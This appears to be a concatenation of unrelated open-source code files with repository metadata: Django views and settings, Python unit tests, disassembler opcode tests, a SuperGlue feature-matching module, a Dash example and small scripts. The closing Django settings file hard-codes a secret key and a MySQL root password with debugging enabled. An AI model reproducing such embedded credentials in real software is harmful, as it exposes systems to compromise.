        elif dfsr & self.DFSR_EXTERNAL:
            reason = Target.HaltReason.EXTERNAL
        elif dfsr & self.DFSR_PMU:
            reason = Target.HaltReason.PMU
        else:
            reason = None
        return reason
| [
"flit@me.com"
] | flit@me.com |
9ecf378f5d3e1aa424496b98922212a95c491601 | 68eb8913b251e711ba146097b08fde79fe6dc66f | /hier/views.py | 510353afa579c80ac36f7defd9dbbdc3115374ad | [] | no_license | youhyun97/invisible_Beta | 76003c6be1e753731d5e1f0809830be4f551395f | 896e707894efd9d5a1cbf8e9d8c614863ac000ab | refs/heads/master | 2020-06-29T22:08:21.212238 | 2019-08-05T10:54:31 | 2019-08-05T10:54:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,010 | py | from django.shortcuts import render, get_object_or_404, redirect
from invi_app.models import Lecture, Lecturefeature, Feature, Lectureteacher
##################################
def home(request):
    """Render the home page listing lectures that have no feature assigned yet."""
    # Raw-SQL join: lectures whose lectureFeature row carries a NULL feature_id.
    lecture = Lecture.objects.extra(tables=['lectureFeature'], where=['lectureFeature.lecture_id=lecture.lecture_id AND lectureFeature.feature_id is NULL'])
    return render(request, 'home.html', {'lec_list': lecture})
##################################
def detail(request, lecture_id):
    """Render the detail page for one lecture with the selectable feature list."""
    lec_detail = get_object_or_404(Lecture, pk=lecture_id)
    # Lecture features up to id 11 (the lecture-feature choice list)
    lec_feature = Feature.objects.filter(feature_id__lte=11)
    # Number of teachers for this lecture
    teacher_num = Lectureteacher.objects.extra(select=['count(teacher_id)'], tables=['lecture'], where=['lectureTeacher.lecture_id=lecture.lecture_id AND lecture.lecture_id =%s'], select_params=(lecture_id))
    print(teacher_num)
    # If it is a joint (multi-teacher) lecture
    # Otherwise
    return render(request, 'detail.html', {'lec':lec_detail, 'lec_feature':lec_feature})
##################################
def save(request):
    """Store the two features chosen for a lecture, then redirect home.

    On success the placeholder (NULL-feature) rows for the lecture are
    deleted; on failure the save is abandoned and the user is simply
    redirected back.
    """
    getlec = Lecture.objects.get(lecture_id=int(request.GET['lecID']))
    getfeat = Feature.objects.get(feature_id=int(request.GET['lec_selec_1']))
    # Try to store the selected features
    try:
        # Save feature #1
        feature1 = Lecturefeature(lecture=getlec, feature=getfeat)
        feature1.save()
        getfeat = Feature.objects.get(feature_id=int(request.GET['lec_selec_2']))
        # Save feature #2
        feature2 = Lecturefeature(lecture=getlec, feature=getfeat)
        feature2.save()
    # On failure: best-effort redirect without saving.  Was a bare `except:`,
    # which also swallowed SystemExit/KeyboardInterrupt.
    except Exception:
        return redirect('/hier/')
    # On success
    else:
        # Remove the placeholder rows whose feature is NULL
        # (dropped the unused `nullnull` binding; .delete() runs either way).
        Lecturefeature.objects.filter(lecture=getlec, feature__isnull=True).delete()
        return redirect('/hier/')
##################################
'''
#TODO
#
# detail에 선생님 특징 출력
# url 앱 내로 옮기기
# restful하게 고치기
''' | [
"HyeyoungCho97@gmail.com"
] | HyeyoungCho97@gmail.com |
964be754ef86bec5917a57c625ad4ed6a31349f8 | dcafbc9a6eea2b0e9aabc527b93cd97d270a67af | /tests/test_cli.py | 1cc1282f4575e65d72cfcb43033f27022e631d72 | [
"MIT"
] | permissive | bfontaine/edt2ics | 83fbd51540d7887e049be90efb70f382110dafaf | 1245f174694c30a42c489d831970c32ae42c0b0d | refs/heads/master | 2021-05-15T01:55:46.595212 | 2015-01-05T11:31:48 | 2015-01-05T11:31:48 | 24,652,011 | 1 | 0 | MIT | 2021-03-23T09:20:53 | 2014-09-30T19:18:04 | Python | UTF-8 | Python | false | false | 1,722 | py | # -*- coding: UTF-8 -*-
import sys
from tempfile import NamedTemporaryFile
from os import remove
try:
import unittest2 as unittest
from cStringIO import StringIO
except ImportError:
from io import StringIO
import unittest
from edt2ics.cli import write_ical, main, ScheduleScraper
def ctrlC(self, *args, **kwargs):
    """Stand-in for ScheduleScraper.__init__ that simulates a Ctrl-C."""
    raise KeyboardInterrupt()
class TestCli(unittest.TestCase):
    """Tests for the edt2ics CLI: iCal output writing and interrupt handling."""

    def setUp(self):
        # Capture stdout and stub out sys.exit so main() cannot kill the run.
        self.real_stdout = sys.stdout
        self.stdout = sys.stdout = StringIO()
        self.argv = sys.argv
        self.sys_exit = sys.exit
        self.exit_code = None
        self.ss_init = ScheduleScraper.__init__
        def _fake_exit(code=None):
            self.exit_code = code
        _fake_exit.__name__ = sys.exit.__name__
        sys.exit = _fake_exit

    def tearDown(self):
        # Restore everything setUp patched.
        sys.stdout = self.real_stdout
        sys.argv = self.argv
        sys.exit = self.sys_exit
        ScheduleScraper.__init__ = self.ss_init

    # write_ical

    def test_write_stdout(self):
        # A filename of '-' means "write to stdout".
        # (assertEquals is a deprecated alias; assertEqual works on both
        # Python 2's unittest2 and Python 3's unittest.)
        s = u'foobarXz123$$9_=+@@'
        write_ical(s, '-')
        self.stdout.seek(0)
        self.assertEqual(s, self.stdout.read())

    def test_write_file(self):
        s = u'foo&"b$**a-rXz12%x3ZZ$$9_=+@@'
        file_ = NamedTemporaryFile(delete=False)
        file_.close()
        filename = file_.name
        write_ical(s, filename)
        with open(filename, 'r') as f:
            self.assertEqual(s, f.read())
        remove(filename)

    # main

    def test_main_abort_on_interrupt(self):
        # A KeyboardInterrupt while scraping should make main() exit with 1.
        ScheduleScraper.__init__ = ctrlC
        sys.argv = ['edt2ics', 'M2']
        self.assertEqual(None, self.exit_code)
        main()
        self.assertEqual(1, self.exit_code)
| [
"batifon@yahoo.fr"
] | batifon@yahoo.fr |
4344d7b0f4c19f27896dd13ab0f65e65e0e64627 | 7f523c407d45d116860eff67f079e807f2b53339 | /src/third_party/beaengine/tests/0f46.py | 6ad6b5dec2522c38575bfec34ef1d56a52f05929 | [
"LGPL-3.0-only",
"LGPL-2.0-or-later",
"MIT"
] | permissive | 0vercl0k/rp | a352c96bfe3715eb9ce8c5942831123e65289dac | b24e7f58a594aaf0ce3771745bf06862f6ecc074 | refs/heads/master | 2023-08-30T08:03:14.842828 | 2023-08-09T00:41:00 | 2023-08-09T00:41:00 | 3,554,173 | 1,557 | 239 | MIT | 2023-08-09T00:41:02 | 2012-02-26T19:26:33 | C++ | UTF-8 | Python | false | false | 2,862 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
# @author : beaengine@gmail.com
from headers.BeaEnginePython import *
from nose.tools import *
class TestSuite:
    """Disassembly tests for opcode 0F 46: the KXNOR mask-register family.

    The four encodings (W/B/Q/D) differ only in VEX prefix and mnemonic,
    so the previously copy-pasted blocks are factored into one helper.
    """

    def _check_kxnor(self, vex_spec, mnemonic, text):
        """Encode `<vex> 46 cb`, disassemble, and verify opcode/mnemonic/repr.

        Returns the Disasm object so the caller can assert on extra fields.
        """
        myVEX = VEX(vex_spec)
        myVEX.vvvv = 0b1101
        myVEX.R = 1
        Buffer = bytes.fromhex('{}46cb'.format(myVEX.c4()))
        myDisasm = Disasm(Buffer)
        myDisasm.read()
        assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0x46')
        assert_equal(myDisasm.infos.Instruction.Mnemonic, mnemonic)
        assert_equal(myDisasm.repr(), text)
        return myDisasm

    def test(self):
        # VEX.NDS.L1.0F.W0 46 /r -> kxnorW k1, k2, k3
        myDisasm = self._check_kxnor('VEX.NDS.L1.0F.W0', b'kxnorw', 'kxnorw k1, k2, k3')
        # Spot-check the decoded VEX/ModRM fields once.
        assert_equal(myDisasm.infos.Reserved_.VEX.L, 1)
        assert_equal(myDisasm.infos.Reserved_.REX.W_, 0)
        assert_equal(myDisasm.infos.Reserved_.MOD_, 3)

        # VEX.L1.66.0F.W0 46 /r -> kxnorB k1, k2, k3
        self._check_kxnor('VEX.L1.66.0F.W0', b'kxnorb', 'kxnorb k1, k2, k3')

        # VEX.L1.0F.W1 46 /r -> kxnorQ k1, k2, k3
        self._check_kxnor('VEX.L1.0F.W1', b'kxnorq', 'kxnorq k1, k2, k3')

        # VEX.L1.66.0F.W1 46 /r -> kxnorD k1, k2, k3
        self._check_kxnor('VEX.L1.66.0F.W1', b'kxnord', 'kxnord k1, k2, k3')
| [
"noreply@github.com"
] | 0vercl0k.noreply@github.com |
8fbc353c04181575bc228c0842bd83b67d15cd1f | 1213345f1424ff4c0d08d61dde54670ee158099e | /Lektion5/Projekt/data_analyse_oevelse_1.py | da8423e65ef44a5f99090c0a5ba870954e1e63d9 | [] | no_license | victorduun/ITMAL | 62faf07555fb37add9c2f8d7bd7da6af103d6ff5 | 4e50d507f90e8719adad128ee4ba27b6539f4908 | refs/heads/master | 2023-01-31T07:42:43.622706 | 2020-12-11T11:54:41 | 2020-12-11T11:54:41 | 292,845,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | import matplotlib.pyplot as plt
from data_help import data_loader
# Load the housing feature matrix and its labels.
data = data_loader.load_housing_data()
labels = data_loader.load_housing_labels()
# Column 7 is the median-income feature (per the variable name; confirm
# against data_loader's column order).
median_income = data[:,7]
# Plot its distribution as a 30-bin histogram.
plt.hist(median_income, 30)
plt.show()
| [
"43340964+victorduun@users.noreply.github.com"
] | 43340964+victorduun@users.noreply.github.com |
f5c8c797de9a291d4cadce9ee6ba97aafa3cb8dd | 6545040ba6bf07cdd104e1482dabdec0965f9ac7 | /S12/tensornet/data/__init__.py | e2a15219734f5f2bef567518d43095e50fcdf001 | [] | no_license | rvk007/EVA4 | 785394ecbc41a7ecadee44f8ba8a41464762332a | d0c99802a9a2a501c74b8503a3552838d3ce8b27 | refs/heads/master | 2022-08-12T18:22:21.691073 | 2021-10-13T05:27:52 | 2021-10-13T05:27:52 | 239,499,002 | 1 | 3 | null | 2022-06-22T01:42:08 | 2020-02-10T11:46:50 | Jupyter Notebook | UTF-8 | Python | false | false | 50 | py | from .datasets import CIFAR10, MNIST, TinyImageNet | [
"rksharma19896@gmail.com"
] | rksharma19896@gmail.com |
e5e42b8c0aac6428f96b5147ff8e835c3a03c930 | 49390a33a654b3dc4d44fcae6fa3755878f3d6b9 | /qklnn/plots/quickslicer_dummy_net.py | f1aa155c2fe9cdab853d3edbd42769cd290a17bc | [
"MIT"
] | permissive | cambouvy/BSc-Thesis-Project | 4b792d1ded3b3df02fb08694ca4c27cbed2f59ef | ca2504cb828ab068545e130eac393ceb34f2a457 | refs/heads/main | 2023-08-05T08:01:52.156776 | 2021-09-23T20:51:35 | 2021-09-23T20:51:35 | 409,731,196 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,443 | py | """ quickslicer Neural Network specification
This file should be importable from the quickslicer and define three things:
nns: A dictionary-like object containing the neural networks. Each network
should have some basic attributes, a full description is outside the
scope, but if its a QuaLiKizNDNN you are usually set.
slicedim: The dimension (string) that should be sliced over. Should exist
and as input feature of the network in the to-be-sliced 'input' leaf
style: The style of slicing, usually just corrosponds to the output dimensions,
but its partially implemented to e.g. slice 1D output from a 3D output network.
Should be one of 'mono' 'duo' or 'triple'
"""
from collections import OrderedDict
import os
nns = OrderedDict()
# Example pulling a bunch of networks from the NNDB
# from qlknn.NNDB.model import Network
# dbnns = []
# labels = []
# dbnns.append(Network.get_by_id(1723))
# for ii, dbnn in enumerate(dbnns):
# net = dbnn.to_QuaLiKizNN()
# if len(labels) == 0:
# net.label = '_'.join([str(el) for el in [dbnn.__class__.__name__ , dbnn.id]])
# else:
# net.label = labels[ii]
# nns[net.label] = net
# Example using a bunch of on-disk 'Phillip' style late-fusion Neural Networks from disk
# from qlknn.models.kerasmodel import NDHornNet
# network_root = '/home/philipp/Documents/Job/NeuralNets/thirdNets'
# network_names = ['ITG']
#
# for network_name in network_names:
# # Warning! If you use the name 'nn', Keras won't be able to load the network..
# net = NDHornNet(os.path.join(network_root, network_name, 'nn.json'))
# net.label = network_name
# nns[net.label] = net
# Example setting up QuaLiKizNDNN from tests
from qlknn.models.ffnn import QuaLiKizNDNN, QuaLiKizComboNN
root = os.path.dirname(os.path.realpath(__file__))
net_path = os.path.join(root, "../../tests/gen3_test_files/Network_874_efiITG_GB/nn.json")
net = QuaLiKizNDNN.from_json(net_path)
net.label = "Network_874"
nns[net.label] = net
# Example setting up QuaLiKiz4DNN from disk
# from qlkANNk import QuaLiKiz4DNN
# nns['4D'] = QuaLiKiz4DNN()
# nns['4D'].label = '4D'
# nns['4D']._target_names = ['efeITG_GB', 'efiITG_GB']
# Set the slice dim manually based on target names
slicedim = "Ati"
# Pick the plot style from the number of network outputs.
# NOTE(review): a network with more than three targets leaves `style`
# undefined here, causing a NameError downstream - confirm intended.
if len(net._target_names) == 1:
    style = "mono"
elif len(net._target_names) == 2:
    style = "duo"
elif len(net._target_names) == 3:
    style = "triple"
| [
"noreply@github.com"
] | cambouvy.noreply@github.com |
b3e4b05edc296bd9ee9a63e53dc7385f87c7318f | 8e6b8bf00313350eee305d34eea692cd3c05f2e0 | /No11.py | 18dccdb76b59f27b8ad66afd10481392524b7d8f | [] | no_license | gatakaba/project_euler | 316b3da9d1a5f6bbf5793fbedcdf15401aa4eba1 | e600bc8beaee3dbf72c0bdbef0e324c382236582 | refs/heads/master | 2021-01-20T18:24:44.799035 | 2016-08-01T08:52:07 | 2016-08-01T08:52:07 | 64,651,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,446 | py | # coding:utf-8
"""
In the 20×20 grid below, four numbers along a diagonal line have been marked in red.
08 02 22 97 38 15 00 40 00 75 04 05 07 78 52 12 50 77 91 08
49 49 99 40 17 81 18 57 60 87 17 40 98 43 69 48 04 56 62 00
81 49 31 73 55 79 14 29 93 71 40 67 53 88 30 03 49 13 36 65
52 70 95 23 04 60 11 42 69 24 68 56 01 32 56 71 37 02 36 91
22 31 16 71 51 67 63 89 41 92 36 54 22 40 40 28 66 33 13 80
24 47 32 60 99 03 45 02 44 75 33 53 78 36 84 20 35 17 12 50
32 98 81 28 64 23 67 10 26 38 40 67 59 54 70 66 18 38 64 70
67 26 20 68 02 62 12 20 95 63 94 39 63 08 40 91 66 49 94 21
24 55 58 05 66 73 99 26 97 17 78 78 96 83 14 88 34 89 63 72
21 36 23 09 75 00 76 44 20 45 35 14 00 61 33 97 34 31 33 95
78 17 53 28 22 75 31 67 15 94 03 80 04 62 16 14 09 53 56 92
16 39 05 42 96 35 31 47 55 58 88 24 00 17 54 24 36 29 85 57
86 56 00 48 35 71 89 07 05 44 44 37 44 60 21 58 51 54 17 58
19 80 81 68 05 94 47 69 28 73 92 13 86 52 17 77 04 89 55 40
04 52 08 83 97 35 99 16 07 97 57 32 16 26 26 79 33 27 98 66
88 36 68 87 57 62 20 72 03 46 33 67 46 55 12 32 63 93 53 69
04 42 16 73 38 25 39 11 24 94 72 18 08 46 29 32 40 62 76 36
20 69 36 41 72 30 23 88 34 62 99 69 82 67 59 85 74 04 36 16
20 73 35 29 78 31 90 01 74 31 49 71 48 86 81 16 23 57 05 54
01 70 54 71 83 51 54 69 16 92 33 48 61 43 52 01 89 19 67 48
The product of these numbers is 26 × 63 × 78 × 14 = 1788696.
What is the greatest product of four adjacent numbers in the same direction (up, down, left, right, or diagonally) in the 20×20 grid?
"""
matrix = """08 02 22 97 38 15 00 40 00 75 04 05 07 78 52 12 50 77 91 08
49 49 99 40 17 81 18 57 60 87 17 40 98 43 69 48 04 56 62 00
81 49 31 73 55 79 14 29 93 71 40 67 53 88 30 03 49 13 36 65
52 70 95 23 04 60 11 42 69 24 68 56 01 32 56 71 37 02 36 91
22 31 16 71 51 67 63 89 41 92 36 54 22 40 40 28 66 33 13 80
24 47 32 60 99 03 45 02 44 75 33 53 78 36 84 20 35 17 12 50
32 98 81 28 64 23 67 10 26 38 40 67 59 54 70 66 18 38 64 70
67 26 20 68 02 62 12 20 95 63 94 39 63 08 40 91 66 49 94 21
24 55 58 05 66 73 99 26 97 17 78 78 96 83 14 88 34 89 63 72
21 36 23 09 75 00 76 44 20 45 35 14 00 61 33 97 34 31 33 95
78 17 53 28 22 75 31 67 15 94 03 80 04 62 16 14 09 53 56 92
16 39 05 42 96 35 31 47 55 58 88 24 00 17 54 24 36 29 85 57
86 56 00 48 35 71 89 07 05 44 44 37 44 60 21 58 51 54 17 58
19 80 81 68 05 94 47 69 28 73 92 13 86 52 17 77 04 89 55 40
04 52 08 83 97 35 99 16 07 97 57 32 16 26 26 79 33 27 98 66
88 36 68 87 57 62 20 72 03 46 33 67 46 55 12 32 63 93 53 69
04 42 16 73 38 25 39 11 24 94 72 18 08 46 29 32 40 62 76 36
20 69 36 41 72 30 23 88 34 62 99 69 82 67 59 85 74 04 36 16
20 73 35 29 78 31 90 01 74 31 49 71 48 86 81 16 23 57 05 54
01 70 54 71 83 51 54 69 16 92 33 48 61 43 52 01 89 19 67 48"""
import operator
def calc_mul(l):
    """Return the product of all elements of the sequence *l*."""
    # functools.reduce works on both Python 2.6+ and Python 3; the bare
    # `reduce` builtin used before exists only on Python 2.
    from functools import reduce
    return reduce(operator.mul, l)
# Split the grid text into rows, then each row into number strings.
l = matrix.split("\n")
x = map(lambda x: x.split(" "), l)
import numpy as np
# NOTE(review): Python 2 script - on Python 3 `map` returns an iterator
# (np.array would need list(...)) and `print max(...)` below is py2 syntax.
x = np.array(x, dtype=int)
product_list = []
# check row
for i in range(20):
    for j in range(17):
        product_list.append(calc_mul(x[i, j:j + 4]))
# check column
for i in range(17):
    for j in range(20):
        product_list.append(calc_mul(x[i:i + 4, j]))
# For every 4x4 window, take the product along both diagonals.
for i in range(17):
    for j in range(17):
        rect = x[i:i + 4, j:j + 4]
        # check right diagonal
        product_list.append(calc_mul(np.diag(rect)))
        # check left diagonal
        product_list.append(calc_mul(np.diag(np.rot90(rect))))
print max(product_list) | [
"m07112@gmail.com"
] | m07112@gmail.com |
b6c2ce08804c66b293ae4e13ba70f17d93dcfbed | 5465ed0ea2401a8e70d4bbc0ce1e78ca26813c54 | /Dash/example_dropdown.py | 432c0e12326a232ef545016451102df8cf8aca00 | [] | no_license | josephchenhk/learn | 36c49ceb7c8cf8f944ad401b2c7adabf688981a1 | b216bb17570e272555e9da475e4c85eb18139c2a | refs/heads/master | 2023-09-01T04:22:00.984837 | 2023-08-20T01:00:01 | 2023-08-20T01:00:01 | 178,778,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 635 | py | # -*- coding: utf-8 -*-
# @Time : 29/3/2021 3:41 PM
# @Author : Joseph Chen
# @Email : josephchenhk@gmail.com
# @FileName: example_dropdown.py
# @Software: PyCharm
import dash
import dash_html_components as html
import dash_core_components as dcc
app = dash.Dash(__name__)
app.layout = html.Div(
[
html.H1('Selection'),
html.Br(),
dcc.Dropdown(
options=[
{'label': 'option 1', 'value': 1},
{'label': 'option 2', 'value': 2},
{'label': 'option 3', 'value': 3}
]
)
]
)
if __name__=="__main__":
app.run_server()
| [
"josephchenhk@gmail.com"
] | josephchenhk@gmail.com |
783560f6030d496ca56583f01bdacc4cd5a3355f | c45da2c867db1872df2e2a6603bdf7026fd5fb15 | /models_S/matching.py | 06f1ac9de41f4d1029b1999d12f908ca908bc579 | [] | no_license | LexaNagiBator228/Fast-Feature-Matching-with-Linear-Transformers | 42dcb72207f5a43302e69b948592c53f993fc86c | f0ce2ade189a11ab5d9284cbc6a698de93ec5b61 | refs/heads/main | 2023-06-15T15:19:41.130039 | 2021-07-13T13:55:00 | 2021-07-13T13:55:00 | 384,940,145 | 13 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,998 | py | # %BANNER_BEGIN%
# ---------------------------------------------------------------------
# %COPYRIGHT_BEGIN%
#
# Magic Leap, Inc. ("COMPANY") CONFIDENTIAL
#
# Unpublished Copyright (c) 2020
# Magic Leap, Inc., All Rights Reserved.
#
# NOTICE: All information contained herein is, and remains the property
# of COMPANY. The intellectual and technical concepts contained herein
# are proprietary to COMPANY and may be covered by U.S. and Foreign
# Patents, patents in process, and are protected by trade secret or
# copyright law. Dissemination of this information or reproduction of
# this material is strictly forbidden unless prior written permission is
# obtained from COMPANY. Access to the source code contained herein is
# hereby forbidden to anyone except current COMPANY employees, managers
# or contractors who have executed Confidentiality and Non-disclosure
# agreements explicitly covering such access.
#
# The copyright notice above does not evidence any actual or intended
# publication or disclosure of this source code, which includes
# information that is confidential and/or proprietary, and is a trade
# secret, of COMPANY. ANY REPRODUCTION, MODIFICATION, DISTRIBUTION,
# PUBLIC PERFORMANCE, OR PUBLIC DISPLAY OF OR THROUGH USE OF THIS
# SOURCE CODE WITHOUT THE EXPRESS WRITTEN CONSENT OF COMPANY IS
# STRICTLY PROHIBITED, AND IN VIOLATION OF APPLICABLE LAWS AND
# INTERNATIONAL TREATIES. THE RECEIPT OR POSSESSION OF THIS SOURCE
# CODE AND/OR RELATED INFORMATION DOES NOT CONVEY OR IMPLY ANY RIGHTS
# TO REPRODUCE, DISCLOSE OR DISTRIBUTE ITS CONTENTS, OR TO MANUFACTURE,
# USE, OR SELL ANYTHING THAT IT MAY DESCRIBE, IN WHOLE OR IN PART.
#
# %COPYRIGHT_END%
# ----------------------------------------------------------------------
# %AUTHORS_BEGIN%
#
# Originating Authors: Paul-Edouard Sarlin
#
# %AUTHORS_END%
# --------------------------------------------------------------------*/
# %BANNER_END%
import torch
from .superpoint import SuperPoint
from .superglue import SuperGlue
import time
class Matching(torch.nn.Module):
    """ Image Matching Frontend (SuperPoint + SuperGlue) """

    def __init__(self, config=None):
        """Build the SuperPoint detector and SuperGlue matcher.

        Args:
          config: optional dict with 'superpoint' and 'superglue' sub-dicts.
                  (The original used a mutable default argument `config={}`;
                  a None sentinel avoids that pitfall.)
        """
        super().__init__()
        config = {} if config is None else config
        self.superpoint = SuperPoint(config.get('superpoint', {}))
        self.superglue = SuperGlue(config.get('superglue', {}))

    def forward(self, data):
        """ Run SuperPoint (optionally) and SuperGlue
        SuperPoint is skipped if ['keypoints0', 'keypoints1'] exist in input
        Args:
          data: dictionary with minimal keys: ['image0', 'image1']
        Returns:
          (pred, t1): merged prediction dict and SuperGlue wall time in seconds.
        """
        pred = {}

        # Extract SuperPoint (keypoints, scores, descriptors) if not provided
        if 'keypoints0' not in data:
            pred0, _ = self.superpoint({'image': data['image0']}, data['image0'])
            pred = {**pred, **{k + '0': v for k, v in pred0.items()}}
        if 'keypoints1' not in data:
            pred1, _ = self.superpoint({'image': data['image1']}, data['image1'])
            pred = {**pred, **{k + '1': v for k, v in pred1.items()}}

        # Batch all features
        # We should either have i) one image per batch, or
        # ii) the same number of local features for all images in the batch.
        data = {**data, **pred}
        for k in data:
            if isinstance(data[k], (list, tuple)):
                data[k] = torch.stack(data[k])

        # perf_counter() is monotonic, unlike time.time(), so the measured
        # interval cannot be distorted by system clock adjustments.
        t = time.perf_counter()
        # Perform the matching
        pred = {**pred, **self.superglue(data)}
        t1 = time.perf_counter() - t
        print('time super', t1)
        print('Hz super', 1 / t1)
        return pred, t1
| [
"doctorthenord@gmail.com"
] | doctorthenord@gmail.com |
044f8d28a47038da7b2ce3e832b4c7b7fe81e91d | 0cb29aebd2db7c9109ea5f88c1f955ea94bdb629 | /CountingWords.py | ad86961a33be6aa58a3245e51291486dfe2b39b1 | [] | no_license | VIJAYZARGO/c97 | 58f405184a998a6ebb80882b926b17eb574827d2 | 16d33876b874f740f3f4ae2d30539879def1f338 | refs/heads/main | 2023-05-05T13:35:55.216179 | 2021-05-27T10:24:21 | 2021-05-27T10:24:21 | 371,333,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 353 | py | Intro = input("Enter your Introduction : ")
# The original incremented a misspelled variable (`wordCount` vs `WordCount`),
# so the word total never advanced, and printing `wordCount` raised NameError
# for inputs without a space. str.split() counts whitespace-separated words
# (collapsing runs of spaces), and len() counts characters directly.
WordCount = len(Intro.split())
CharacterCount = len(Intro)
print("Number of words in the string : ")
print(WordCount)
print("Number of Characters in the String : ")
print(CharacterCount)
"noreply@github.com"
] | VIJAYZARGO.noreply@github.com |
fb766b2ce7d1f7d85c3afa516ea547ba10ff3c26 | 923d446c5068e24e7ba94c3ffc9d2628334d7620 | /software/software/urls.py | 638318c82644ca212da0ffec7ea0e572681d0c54 | [] | no_license | FncAriel/GestordeArchivos | bd18bd80bf9dab2649769728be446ed6e459aacc | 9da8e5722d81f250bf399ef9b08c8031696ac44f | refs/heads/master | 2020-06-10T04:36:14.063014 | 2019-08-16T22:25:03 | 2019-08-16T22:25:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 824 | py | """software URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
# Root URL configuration: admin site plus the planos app mounted at "/".
urlpatterns = [
    path('admin/', admin.site.urls),  # Django admin interface
    path('', include('apps.planos.urls')),  # application routes at site root
]
| [
"noreply@github.com"
] | FncAriel.noreply@github.com |
c52183b9689e7f5b9605278ebd70320785d7081f | 1b56e3902b66fe138483d5e4d08bdb04d3d7572c | /AMDB/settings.py | f41c5e5b1455c1322b5b1f5052fa4ec037679546 | [] | no_license | Sanskar-Jain/AMDB | 06f2fe535b7679a7ef763301a6e4ad7a93616866 | c01f76dc63f7fdb80656e20cc9ebc4dd63b1a0ca | refs/heads/master | 2021-01-20T05:36:28.264260 | 2017-04-29T18:34:34 | 2017-04-29T18:34:34 | 89,517,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,379 | py | """
Django settings for AMDB project.
Generated by 'django-admin startproject' using Django 1.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is committed to source control here; rotate it and
# load it from an environment variable before any real deployment.
SECRET_KEY = '4z=q-j3^6@fokpm!ypkvzy1*5sb=sykths!%@!bj11yb+-+nr1'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Hostnames this site may serve; must be filled in once DEBUG is False.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'users',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'AMDB.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'AMDB.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
# NOTE(review): the original file assigned DATABASES twice; the first
# (sqlite3) literal was dead code, silently overwritten by this MySQL one.
# For local sqlite development use:
#   {'ENGINE': 'django.db.backends.sqlite3',
#    'NAME': os.path.join(BASE_DIR, 'db.sqlite3')}
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': 'amdb',
        'USER': 'root',
        # SECURITY(review): hard-coded credentials; load from the environment.
        'PASSWORD': 'abcde12345',
        'PORT': '3306',
        'HOST': 'localhost',  # Or an IP Address that your DB is hosted on.
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"sanskar27jain@gmail.com"
] | sanskar27jain@gmail.com |
